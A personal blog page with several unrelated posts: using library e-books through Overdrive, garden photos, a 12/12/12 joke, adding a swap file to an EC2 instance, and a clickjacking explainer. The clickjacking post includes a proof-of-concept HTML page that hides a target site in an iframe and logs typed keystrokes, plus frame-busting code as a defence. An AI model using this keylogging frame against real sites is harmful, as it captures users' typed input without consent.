DRM is good for something

Many people are frustrated with Digital Rights Management preventing them from doing to music and e-books what they are used to doing with computer files – backups, convenience of having your media on all of your devices, and for some, piracy.  Of course, it’s the third that drives the need for DRM in the first place.

Recently I’ve been exposed to a use of DRM that I find very, very good.  I’ve been using my iPad to access my library’s Overdrive section – essentially eBooks from the library.  From the convenience of my couch at home or while away on vacation, I can browse online the books available, check them out, and download them to my iPad (or my kids’ kindle, etc) immediately.   At the end of the two week lending period, if I’ve not already deleted it/turned it back in, it automatically deletes for me.   No more having to remember to do so.

This is GREAT!   Depending on the availability of the material, I may never have to buy a book again.   I’m finding that most of the county library websites I’ve visited have Overdrive collections as well.  My Fort Bend County account does not give access to a whole lot, but I also have a Harris County library card, and they have a lot more selection.   I checked out the Houston Public Library site this morning, and it has a fairly extensive collection as well, so I am going to try to go today and get a library card.    I can see that “collecting library accounts” could soon be a fun pastime.   🙂   The Houston Public Library offers accounts to any Texas resident… perhaps Austin, San Antonio, and Dallas have similar offerings.   Time to take advantage of tax dollars being spent!

Lettuce Trees, Baby Broccoli, and Rainbow Peppers

Here’s what GB1 looked like on the last warm day of the year (Dec 9th) – lettuce and kale look like trees, sure enough!

Lettuce Trees

Finally today I saw evidence of Broccoli crowns!

Baby Broccoli

Back in the conventional garden, I spotted a serrano in red, orange and green all at once. Usually it’s green to black to red – perhaps the odd cold then warm weather played a part…

Rainbow Pepper

Clickjacking

Clickjacking is a vulnerability where pages with sensitive functionality are placed in an invisible IFRAME that overlays seemingly innocuous content. By enticing the user to click various buttons in the innocuous content, the attacker can get victims to click buttons that perform sensitive functionality. Because the victim is actually interacting with the application through the hidden frame, the victim’s cookies containing the session identifier are being sent with each request. If they are already authenticated, any authenticated functionality would be accessible.

Steps to reproduce:
1.    Open the below HTML file with an IE browser, changing the IFRAME target to some webpage with form input.

<html>
<head>
<title>Clickjacking</title>
<script>
var keylog='Entered text: ';
function keypress() {
keylog = keylog + String.fromCharCode(window.event.keyCode);
window.status=keylog;
}
</script>
</head>
<body style="margin: 0; padding: 0"
onKeyPress="keypress()"
onLoad="this.focus()"
onBlur="this.focus()">
<div style="padding: 10px; border-bottom: 1px solid red; color=red;">
(see typed words in your status bar)
</div>
<iframe src="https://www.somesite.com/"
width="100%" height="90%" padding="0"
margin="0" frameborder="0" security="Restricted">
</body>
</head>

2. Enter text in any input field and observe that the page is hosted in an IFRAME that echoes back the entered text.   Creepy!

Pages that include form input need to prevent other pages from setting them in iframes and stealing keypresses.  The following JavaScript can be used to “break out” of any frames and ensure that the site is loaded on the top window and not in any frame controlled by the attacker.

if (top!= self) top.location.href = self.document.location;
if (parent!= self) top.location.href = location.href;
if (top.frames.length!=0) top.location=self.document.location;
if (window!= window.top) top.location.href = location.href;

Happy 12/12/12, Everybody!

I’m also going to post this at 12:12:12.  Geeky!  🙂

In other news, according to the Mayan Calendar, there are only 9 more days until the end of the world! What are you going to do with it?

Actually, I already know that’s not going to happen. You know why? Because weather.com says that the high and low for 12/21 are 68 and 51 deg F in Sugar Land, and they are always right.  Those can’t be doomsday temperatures, can they?   🙂

The whole thing is really more of flipping a cycle in the mayan calendar, sort of like going from 9,999 to 10,000.    I think.   Read the links above.   I don’t have time, I’ve got too much to do in the next 9 days.

Add Swap File to Amazon EC2 Instance

I’m playing around with a free-for-a-year micro instance of Amazon’s Elastic Compute Cloud (EC2), and I noticed that while there’s around 600 MB of memory, there was no swap set up! That can grind things to a halt pretty fast. So I set one up:


[root@tauceti ~]# free
total used free shared buffers cached
Mem: 605060 596996 8064 0 68568 440104
-/+ buffers/cache: 88324 516736
Swap: 0 0 0

[root@tauceti ~]# df -k
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/xvde1 6190664 1344280 4531916 23% /
tmpfs 302528 0 302528 0% /dev/shm

[root@tauceti ~]# dd if=/dev/zero of=/swapfile1 bs=1024 count=524288
524288+0 records in
524288+0 records out
536870912 bytes (537 MB) copied, 14.8886 s, 36.1 MB/s

[root@tauceti ~]# df -k
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/xvde1 6190664 1870116 4006080 32% /
tmpfs 302528 0 302528 0% /dev/shm

[root@tauceti ~]# mkswap /swapfile1
Setting up swapspace version 1, size = 524284 KiB
no label, UUID=767b5917-4ff4-453e-bb3a-db644a7a7824

[root@tauceti ~]# chown root:root /swapfile1
[root@tauceti ~]# chmod 0600 /swapfile1
[root@tauceti ~]# swapon /swapfile1
[root@tauceti ~]# echo '/swapfile1 swap swap defaults 0 0' >> /etc/fstab

[root@tauceti ~]# free
total used free shared buffers cached
Mem: 605060 597368 7692 0 68576 440104
-/+ buffers/cache: 88688 516372
Swap: 524280 0 524280